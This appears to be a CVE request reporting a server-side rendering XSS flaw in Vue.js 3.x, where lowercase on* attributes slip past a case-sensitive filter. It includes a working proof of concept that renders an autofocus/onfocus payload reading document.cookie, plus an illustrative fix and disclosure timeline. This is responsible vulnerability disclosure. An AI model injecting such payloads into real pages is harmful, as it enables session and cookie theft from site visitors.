CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a high-severity vulnerability in Vue.js. The vendor has not responded after 10 days. This is a separate vulnerability from the RCE reported in #7299.
Existing Advisory
- GHSA: GHSA-5w45-w79q-rpqq (submitted 2026-03-31, still in triage)
- MITRE: Ticket #2013988 (submitted 2026-03-25) + CVE Form (submitted 2026-04-03)
- Vendor: security@vuejs.org — notified 2026-03-25, zero response
Vulnerability Summary
| Field | Value |
|---|---|
| Product | Vue.js (vuejs/core) — @vue/shared, @vue/server-renderer |
| Versions | All Vue 3.x through 3.5.30 (latest) |
| CWE | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| CVSS | 7.2 High (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) |
| Type | SSR Cross-Site Scripting — Regression of CVE-2018-6341 |
Root Cause
The `isOn()` function in `packages/shared/src/general.ts:15` uses a case-sensitive check: a key is treated as an event listener (and therefore dropped from SSR output) only when it starts with `on` followed by a character that is not a lowercase ASCII letter, which in practice means camelCase names such as `onClick`. HTML event handler attribute names are ASCII case-insensitive, however, so `onclick`, `ONCLICK` and `oNcLiCk` all fail the check and are rendered verbatim into the SSR HTML output, where the browser executes them.

```js
// isOn() only matches "on" + a third character outside a-z (i.e. camelCase listeners)
export const isOn = (key) =>
  key.charCodeAt(0) === 111 && // 'o'
  key.charCodeAt(1) === 110 && // 'n'
  (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97) // not a lowercase letter: onClick yes, onclick no
```

- `onClick` → filtered ✓
- `onclick` → bypasses filter ✗ (browser still executes)
- `ONCLICK` → bypasses filter ✗
Proof of Concept
```js
// Run as an ES module (.mjs) so top-level await is available.
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'

// Root props that the component does not declare as props fall through
// into $attrs, which the template re-binds onto the <input>.
// (renderToString's second argument is the SSR context, not root props.)
const app = createSSRApp(
  {
    template: '<input v-bind="$attrs" />',
    inheritAttrs: true
  },
  { autofocus: '', onfocus: 'alert(document.cookie)' }
)

const html = await renderToString(app)
console.log(html)
// Output: <input autofocus onfocus="alert(document.cookie)">
// Zero-interaction XSS: autofocus triggers onfocus automatically
```
21 out of 21 DOM event handler attributes render in SSR output when using lowercase on* names.
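To make the root cause and the PoC concrete without running Vue, the following is an added example (not Vue's code and not part of this report): it reproduces the `isOn()` check quoted above, places a case-insensitive check beside it, and runs both over a constructed attacker-controlled attribute map through a toy attribute renderer. The `isEventHandlerAttr` regex is a proposed check, `renderAttrs` is a simplified stand-in for `ssrRenderAttrs()` in `@vue/server-renderer` (not its actual implementation), and `sanitizeAttrs` is an application-side mitigation an integrator could apply before `v-bind="$attrs"`; all three are assumptions of this example.

```javascript
// Vue's isOn() as quoted in the report: true only when the name starts with
// "on" and the third character is NOT a lowercase ASCII letter (onClick, onX).
const isOn = (key) =>
  key.charCodeAt(0) === 111 && // 'o'
  key.charCodeAt(1) === 110 && // 'n'
  (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97);

// Proposed check (assumption, not Vue's code): HTML attribute names are
// ASCII case-insensitive, so any name whose lowercase form starts with "on"
// is an event handler and must never reach rendered markup.
const isEventHandlerAttr = (key) => /^on/i.test(key);

// Minimal attribute-value escaping for the toy renderer below.
const escapeAttr = (v) =>
  String(v)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');

// Toy stand-in for ssrRenderAttrs(): skips keys flagged by `shouldDrop`,
// renders an empty-string value as a boolean attribute (e.g. `autofocus`).
function renderAttrs(attrs, shouldDrop) {
  let out = '';
  for (const key of Object.keys(attrs)) {
    if (shouldDrop(key)) continue;
    const value = attrs[key];
    out += value === '' ? ` ${key}` : ` ${key}="${escapeAttr(value)}"`;
  }
  return out;
}

// Application-side mitigation: strip every on* attribute, any casing,
// before handing untrusted attrs to v-bind.
function sanitizeAttrs(attrs) {
  const clean = {};
  for (const key of Object.keys(attrs)) {
    if (!isEventHandlerAttr(key)) clean[key] = attrs[key];
  }
  return clean;
}

// Constructed attacker-controlled attribute map (not captured traffic).
const untrustedAttrs = {
  autofocus: '',
  onfocus: 'alert(document.cookie)',
  class: 'field',
};

// Render the same map with the case-sensitive and the case-insensitive filter.
function demo() {
  return {
    vulnerable: `<input${renderAttrs(untrustedAttrs, isOn)}>`,
    hardened: `<input${renderAttrs(untrustedAttrs, isEventHandlerAttr)}>`,
  };
}

console.log(demo());
// vulnerable: <input autofocus onfocus="alert(document.cookie)" class="field">
// hardened:   <input autofocus class="field">
```

Note that `isEventHandlerAttr` rejects every name beginning with `on`, including non-standard custom attributes; for the SSR attribute sink that is the safe direction, since no legitimate rendered attribute needs a name that a browser would parse as an event handler. Vue uses `isOn()` for listener detection in the client runtime as well, so a fix inside the library itself is a broader change than this example.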
Prior Art
- CVE-2018-6341 (Vue 2.x SSR v-bind XSS): The same class of vulnerability in Vue 2, fixed in v2.5.17. Vue 3's fix is incomplete — it only blocks camelCase event attributes, not lowercase/uppercase variants.
Disclosure Timeline
| Date | Action |
|---|---|
| 2026-03-25 | Reported to security@vuejs.org |
| 2026-03-25 | MITRE ticket #2013988 submitted |
| 2026-03-31 | GitHub PVR GHSA-5w45-w79q-rpqq submitted |
| 2026-04-03 | MITRE CVE Form submitted |
| 2026-04-04 | This GitHub CNA request |
| 2026-06-23 | 90-day public disclosure deadline |
Request
Please assign a CVE ID for this vulnerability. This is a distinct vulnerability (XSS, different root cause and CWE) from the RCE reported in #7299. The vendor has been completely unresponsive across all channels.